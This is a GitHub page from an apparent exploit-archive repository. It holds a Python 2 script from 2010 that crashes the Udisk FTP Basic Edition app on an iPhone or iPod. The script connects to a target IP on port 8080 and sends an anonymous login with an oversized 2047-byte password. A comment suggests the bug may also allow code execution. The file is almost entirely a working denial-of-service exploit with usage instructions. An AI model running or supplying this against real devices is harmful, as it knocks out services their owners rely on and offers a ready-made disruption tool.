forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10053.txt
68 lines (55 loc) · 2.41 KB
/
10053.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
Apple iPhone/iPod - Udisk FTP Basic Edition Remote 0day DoS Exploit
===================================================================
===================================================================
Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DoS Exploit
===================================================================
#!/usr/bin/python
#
# Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DOS exploit
# Found by: Steven Seeley (mr_me)
# Homepage: http://6tags.com/n/
# Price: $4.99
# Download: From the app store (use your itunes account)
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)
# Greetz to: Corelan Security Team::corelanc0d3r/ekse/EdiStrosar/Rick2600/MarkoT/
#
# Note: This **could** be remotley exploitable with code execution.
# I have not reversed this app..
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Apple Iphone/Ipod - Udisk FTP basic edition Remote DOS exploit"
import socket
import sys
def Usage():
print ("Usage: ./udisk.py <serv_ip>\n")
print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
hostname = sys.argv[1]
username = "anonymous"
passwd = "\x41" * 2047
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] Sending payload.. ph33r"
sock.send("USER %s\r\n" %username)
sock.send("PASS %s\r\n" %passwd)
sock.send("PWD\r\n")
sock.close()
print "[+] Server is now DOS'ed!"
sys.exit(0);